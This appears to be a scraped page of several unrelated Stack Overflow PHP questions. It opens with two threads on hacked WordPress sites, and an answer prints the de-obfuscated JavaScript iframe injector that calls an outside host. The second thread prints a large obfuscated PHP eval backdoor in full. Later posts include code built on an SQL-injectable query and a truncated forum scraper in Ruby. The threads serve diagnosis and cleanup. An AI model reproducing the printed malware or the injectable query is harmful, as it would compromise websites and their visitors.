How to find malicous code/malware on a website [closed] - php
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 9 years ago.
Improve this question
My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.
I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicous code (they referred to it as a code injection).
I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.
Any help would be greatly appreciated.
EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there. My thoughts are that its either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.
This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.
Related
Wordpress site hacked: Un obfuscate malicious code [closed]
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of the sites I manage got hacked through a wordpress install in the shared environment.
It looks like some maleware has been injected into all the php files on the server. I've managed to delete all references of the code and changed all the passwords. Subsequently ive been getting failed login attemps from an ip in the ukraine...
<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?>
<?php
$vkvmlmaavg = 'zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfs%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6N}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x78x5c%x782fq%x5c%x7825>2q%x5c%x7825<#x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%xMPT7-NBFSUT%x5c%x7860LDPT7-U256]y6g]257]y86]267]y74]275]y7:]<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x78{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x780{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860825-bubE{h%x5c%x7825)sutcc%x7824]25%x5c%x7824-%x5c%x7824-!c%x7825%x5c%x787f!<X>b%x5c%x7825Z334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x78:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%c%x7825>U<#16,47R57,27R66,#%7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)y81]265]y72]254]y76]61]y33]6#]y76]277]y72]265]y39]274]y85]273]yq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7826<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]if((function_exists("%x6f%142%x5f%163%x74%141%x72%164"%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x78c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*1x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x825)euhA)3of>2bd%x5c%x7825!<5h%x5%x5c%x7825%x5c%x782fh%x5c%x7825)n]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x55c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-sf*#npd%x5c%x782f#)rrd%x5c%x78%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x5)!gj!~<ofmy%x5c%x7825,3,j%25>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782frx7824-%x5c%x7824*<!~!ds]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%7x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x}%x5c%x7878;0]=])0#)U!%x5cx5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x76g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]y83]273]y76]277#<%x5c%x7825t2w>#]*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpetj{fpg)%x5c%x7825%x5c%7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopw6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!ufs:~928>>%x5c%x7822:ftmbg39*56A:>c%x7860TW~%x5c%x7824<%x5c%x78ex5c%x787f!>>%x5c%x7822!pd%x5c%x7:55946-tr.984:75983:48984:71TW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%25-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5qmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c37]278]225]241]334]368]32mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<*x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78268]y7f#<!%x5c%x7825tc%x785cq%x5c%x78257%x5c%x782f7###7%xx7860{6~6<tfs%x5c%x7825.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x525zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!7824-%x5c%x7824<%x5c%x7825j,,*!|%x5%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R2ov{h19275j{hnpd19275fub%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfbqov>*ofmy%x5c%x7825)utjm!|!*5!%x525s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6FOJ%x5c%x7860GB)fubfsdXA%x5c%452]88]5]48]32M3]317]445]212]445]fmji%x5c%x7878:<##:>:h%x5c%x724!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]760hA%x5c%x7827pd%x5c%x782%x5c%x7825-#+I#)q%x5c%x7825:vt)fubmgoj{hA!osvufs!~<3,j%x5c%x_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x78605)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0x787f%x5c%x787f%x5c%x787F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x786%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ft4-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=turn chr(ord($n)-1);} #error_reporting(0); preg_replace("%x2f%50%]281Ld]245]K2]285]Ke]525cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x58]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6}.;%x5c%x7860UQPMSVD!-id%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){re25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x74+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>%x5c%x7825!|!*)323zbek!~!<b%x5#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%825:<#64y]552]e7y]#>n%x5c%x7825<#37224Ypp3)%x5c%x7825cB%x5c%x7825igj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%y74]273]y76]252]y85]c%x7825%x5c%x782f#0#%x5c%x782e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,54]y76#<%x5c%x7825tmw!>!#]y84]27525c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x78hmg%x5c%x7825!<12>j%x5c%x782#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3", NULL); }4%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yx785cq%x5c%x7825%x5c%x7827j>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x78608]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}Ux787f;!opjudovg}k~~9{d%x5c%x7825:osv*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6!2p%x5c%x7825!*3>?*2b%x5c%x7825)7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x78=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x786x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP56%152%x66%147%x67%42%x2c%163%x73Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj65,d7R17,67R37,#%x5c%x782fq%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7825x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>76]277]y72]265]y39]271]y83]256]y78]248]y83]256]25}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)x7825!osvufs!*!+A!>!<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%))1%x5c%x782f35.)1%x5c%x782f12]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x78<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5cc%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc%x7825!*9!%x5c%x7827!hmg%x5c%x782yfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!5r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])5c%x782f7^#iubq#%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<43]321]464]284]364]6]2/(.*)/epreg_replacekjfgnktllk';
$acpbcdcqwr = explode(chr((169 - 125)), '1655,54,9690,46,6518,63,6253,65,7910,69,223,49,8581,31,7446,62,6068,59,6431,60,9241,70,1801,68,5545,25,8758,56,1605,50,8661,68,9867,70,85,41,7979,55,4228,45,9814,53,1709,36,806,52,417,28,5389,29,3938,67,2879,51,2355,66,4132,36,9736,21,7559,27,4273,58,1137,70,2795,43,8459,54,768,38,4005,39,8034,63,4168,23,3430,64,1909,54,5334,55,477,53,10029,55,4191,37,3375,55,4401,43,8915,56,6491,27,6844,56,9624,66,3661,32,6000,68,6581,43,858,25,5598,32,4686,47,7049,61,595,46,3791,36,9484,34,2630,27,5870,69,5243,34,272,37,2066,47,7350,28,2113,63,4884,44,1490,56,8814,54,8195,32,7685,32,2956,57,2228,33,7206,29,2551,29,641,41,7235,38,7847,63,7586,44,2838,41,3097,55,1305,59,0,52,1427,63,8227,41,3304,49,5630,35,4044,67,4444,22,6900,30,916,33,8991,61,6784,60,9518,51,9355,64,52,33,354,63,2421,68,7811,36,3597,34,7110,40,5136,23,3895,43,1077,60,9982,47,8971,20,530,65,5780,24,6127,60,5075,61,8729,29,1207,28,188,35,309,45,5804,66,7771,40,3220,30,3250,54,2930,26,8368,40,1869,40,5731,49,4802,47,1392,35,3013,50,8097,62,7273,33,3063,34,7186,20,445,32,4111,21,9311,44,732,36,2657,69,2261,33,5570,28,3152,68,5451,29,6983,36,2294,61,1235,70,5665,66,949,58,4928,53,883,33,9052,47,1963,67,9937,45,5159,38,5197,46,3827,43,2580,50,4849,35,1546,59,6187,66,3353,22,2726,23,1007,70,5480,65,5939,61,7019,30,126,62,7306,44,6340,43,9569,55,9183,58,4584,65,3721,70,9757,57,4466,63,2489,62,2030,36,4733,69,3693,28,7150,36,8513,68,8159,36,682,50,4649,37,6318,22,8612,49,7717,54,1745,56,7378,56,3870,25,9128,55,5418,33,10084,22,3494,66,9099,29,6624,59,5033,42,4981,52,8307,61,8268,39,5277,57,3560,37,4331,70,8408,51,6731,53,4529,55,3631,30,6383,48,9419,65,6930,53,2176,52,6683,48,7508,51,8868,47,1364,28,7630,55,2749,46,7434,12');
$krdnhuyxrk = substr($vkvmlmaavg, (38379 - 28273), (35 - 28));
if (!function_exists('bvbkmkuetp'))
{
function bvbkmkuetp($lkmdhuzumr, $syqugkbwaa)
{
$wkmwfztjxy = NULL;
for ($wpopdgyvwt = 0; $wpopdgyvwt < (sizeof($lkmdhuzumr) / 2); $wpopdgyvwt++)
{
$wkmwfztjxy. = substr($syqugkbwaa, $lkmdhuzumr[($wpopdgyvwt * 2)], $lkmdhuzumr[($wpopdgyvwt * 2) + 1]);
}
return $wkmwfztjxy;
};
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x30\55\x34\71\x38\51\x29\54\x20\142\x76\142\x6b\155\x6b\165\x65\164\x70\50\x24\141\x63\160\x62\143\x64\143\x71\167\x72\54\x24\166\x6b\166\x6d\154\x6d\141\x61\166\x67\51\x29\51\x3b\40\x2f\52\x20\167\x68\156\x75\164\x6c\152\x78\153\x70\40\x2a\57\x20";
$lrykfpczcb = substr($vkvmlmaavg, (55025 - 44912), (61 - 49));
$lrykfpczcb($krdnhuyxrk, $knticqyoeu, NULL);
$lrykfpczcb = $knticqyoeu;
$lrykfpczcb = (376 - 255);
$vkvmlmaavg = $lrykfpczcb - 1;
?>
My question is, what does this code do? I have tried quite a few obfuscation tools but it to no avail. Is anyone able to help decipher this?
This question has been answered in another Stack Exchange site: https://security.stackexchange.com/questions/70579/is-this-a-backdoor Excerpts from that answer: This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript ... It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin ... The key takeaway from this incident is to backup your data frequently and update your software conscientiously Answered by https://security.stackexchange.com/users/9312/question-overflow
Dynamic Time for PHP Website [closed]
Closed. This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 7 years ago. Improve this question I am working on making a website for my group that hosts a couple of game servers. In the process I have made a website that pings the server, and in return displays whether it is up or down. I want to be able to say that if it is down, you can email me. That part works. What I don't want is for a user to be able to keep emailing me, after they sent it once. I was wondering if I can somehow make a script that when any user clicks the link to email me, that NO other user can email me for about another hour. I figure this would have to be something server sided. I made a script in the past, and it works it adds one hour when someone clicks the link. Problem is when said user goes back to that directory, they can click it again because the time did not save. I also want it to that if multiple users click on the link at the same time it only adds 1 hour, not multiple (Example, 3 users are at the website 2 users click the notify it would add 2 hours instead of just 1.) Any hints in the right direction would be great. I thought about using MySQL but don'w want to unless if absolutely needed (Don't know how possible it is with our Database setup)
One other option would be to have a file sitting somewhere on the server that contains a file with the time of the last sent message written inside of it, then comparing that to the current time. Here's a rough example (note that the example is not secure and needs to be sanitized before accepting raw user input, but hopefully it'll point you in the right direction):
<?php
send_email();
function maindir() {
// This will need to be set to the directory containing your time file.
$cwd = '/home/myusername/websites/example.com';
return $cwd;
}
function update_timefile() {
$cwd = maindir();
// The file that will contain the time.
$timefile = 'timefile.txt';
$time = time();
file_put_contents("$cwd/$timefile", $time);
}
function send_email() {
// Note: this should be sanitized more and have security checks performed on it.
// It also assumes that your user's subject and message have been POSTed to this
// .php file.
$subject = ($_POST && isset($_POST['subject']) && !empty($_POST['subject'])) ? $_POST['subject'] ? FALSE;
$message = ($_POST && isset($_POST['message']) && !empty($_POST['message'])) ? $_POST['message'] ? FALSE;
if ($subject && $message) {
$to = 'me#example.com';
$cwd = maindir();
$timefile = 'timefile.txt';
// Current time
$timenow = time();
// Read the time from the time file
$timeget = file_get_contents("$cwd/$timefile");
// Calculate the difference
$timediff = $timenow - $timeget;
// If the difference is greater than or equal to the current time + 3600 seconds..
if ($timediff >= 3600) {
// ... and if the message gets sent...
if (mail($to, $subject, $message)) {
// ... update the time file.
update_timefile();
}
}
}
}
header() not working in php when the url contains parameters? [closed]
Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 7 years ago.
Improve this question
So I'm using $_GET to capture the URL to use it later but when I use $_GET it wont redirect!
So here's my sample code:
URL : http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
php code:
<?php
include 'init.php';
$s = trim($_GET['s']);
$h = trim($_GET['h']);
$i = trim($_GET['i']);
$q = key_check($s,$h,$i);
if($q == 1)
{
header("location:password_active.php");
exit;
}
if($q == 0)
{
header("location:login_failed.php");
exit;
}
?>
EDIT:
key_check( ) function
function key_check($k1,$k2,$id)
{
$query = mysql_query("select key1 from users where user_id = '$id'");
$key1 =mysql_result($query,0);
$query = mysql_query("select key2 from users where user_id = '$id'");
$key2 =mysql_result($query,0);
$y=strcmp($k1,$key1);
$z=strcmp($k2,$key2);
if($y || $z == 0)
{
return 1;
}
else
{
return 0;
}
}
Now when I try this, I got "1" but I'm getting
This web page has a redirect loop
But my password_active.php doesn't have any redirects. It's just an html page.
The URL you're using to access to your script is:
http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php, which does its role and then tries to send the following header :
header("location:password_active.php");
The browser recieves this header, and tries to resolve that relative URL by adding password_active.php after the last slash before the query string (that ?s=xxx string).
So your browser loads:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php again, which does its role again and then send again the same header, and that loads this page:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
Again. And again. And again. After several tries, your browser understands that something is going wrong and stops.
You should use an absolute URL in your HTTP header:
header("Location: /project/password_active.php");
Also, please note how HTTP headers should be written, according to the standard.
Random notes :
According to the file names, $s and $h are both passwords. You should hash them, and not passing them via the URL.
if($y || $z == 0) is unlikely to work as you think, since it will be evaluated as if y or not z in pseudo code, while you may have wanted if not y and not z for password checking.
Also, good point for calling exit() after a Location header. You should never forget that, as it is very important and may cause some trouble in your scripts if you forget them.
Try removing / after file.php. Like index.php?i=sa
How to download all posts of phpBB3 forum if I am not admin? [closed]
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 12 years ago.
Improve this question
I am used to post my ideas on one forum and started to worry that I will loose them if it gets closed. Do you know a good way to download entire (ideas of other guys are also nice!) phpBB3 forum to a database? Is there software already available, or I have to write it myself?
UPDATE1:
Well, I can write it myself - this is not that hard problem, isn't it? I just don't want to waste time on inventing bicycle.
UPDATE2:
There is an answer at SuperUser: How can I download an entire (active) phpbb forum?
But I preferred to make a Ruby script for backuping the forum. It is not a complete solution, but it is enough for me. And yes, it doesn't violates any TOS if you are so worried.
require :rubygems
require :hpricot
require 'open-uri'
require :uri
require :cgi
#require 'sqlite3-ruby'
class PHPBB
def initialize base_url
#base_url = base_url
#forums, #topics = Array.new(4) { {} }
self.parse_main_page 'main', 'index.php'
#forums.keys.each do |f|
self.parse_forum "forum.#{f}", "viewforum.php?f=#{f}"
end
#topics.keys.each do |t|
self.parse_topic "topic.#{t}", "viewtopic.php?t=#{t}"
end
end
def read_file cached, remote
local = "%s.%s.html" % [__FILE__, cached]
if File.exists? local
return IO.read local
else # download and save
puts "load #{remote}"
File.new(local, "w+") << (content = open(#base_url + remote).read)
return content
end
end
def parse_main_page local, remote
doc = Hpricot(self.read_file(local,remote))
doc.search('ul.forums/li.row').each do |li|
fa = li.search('a.forumtitle').first # forum anchor
f = self.parse_anchor(fa)['f']
#forums[f] = {
forum_id: f,
title: fa.inner_html,
description: li.search('dl/dt').first.inner_html.split('<br />').last.strip
}
